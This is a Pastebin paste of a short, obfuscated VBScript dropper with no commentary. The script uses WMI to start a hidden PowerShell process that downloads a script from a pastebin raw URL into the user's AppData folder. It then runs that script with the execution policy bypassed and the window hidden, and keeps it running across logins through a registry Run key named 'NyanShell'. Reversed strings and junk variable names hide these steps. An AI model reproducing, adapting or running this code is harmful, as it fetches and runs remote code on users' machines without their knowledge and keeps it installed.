Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- startupfolder="C:\Users\"+CreateObject(rev("krowteN.tpircSW")).UserName+"\AppData\Roaming\VHF.ps1"
- gshjgjshsjhsusyuiweiwuwiuwiuiww = "Powershell $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://pastebin.com/raw/1it5wZYJ'',$env:APPDATA+''\\''+''VHF.ps1'')'|D|D"
- Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
- Set yeteuyeuehjehejehjehejenhjehejhejhejehje = objWMIService.Get("Win32_ProcessStartup")
- Set objConfig = yeteuyeuehjehejehjehejenhjehejhejhejehje.SpawnInstance_
- objConfig.ShowWindow = 0
- Set objProcess = objWMIService.Get("Win32_Process")
- intReturn = objProcess.Create(gshjgjshsjhsusyuiweiwuwiuwiuiww, Null, objConfig, intProcessID)
- Set objShell = CreateObject("Wscript.shell")
- objShell.run("powershell -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder)
- Set WshShell = CreateObject("WScript.Shell")
- WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NyanShell","C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder,"REG_SZ"
- Function rev(Str)
- dsd="f"
- ggh="gr"
- If dsd = ddg Then
- else
- For i = Len(Str) To 1 Step -1
- Var = Mid(Str, i, 1)
- reverseString = reverseString & Var
- Next
- rev = reverseString
- End if
- End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement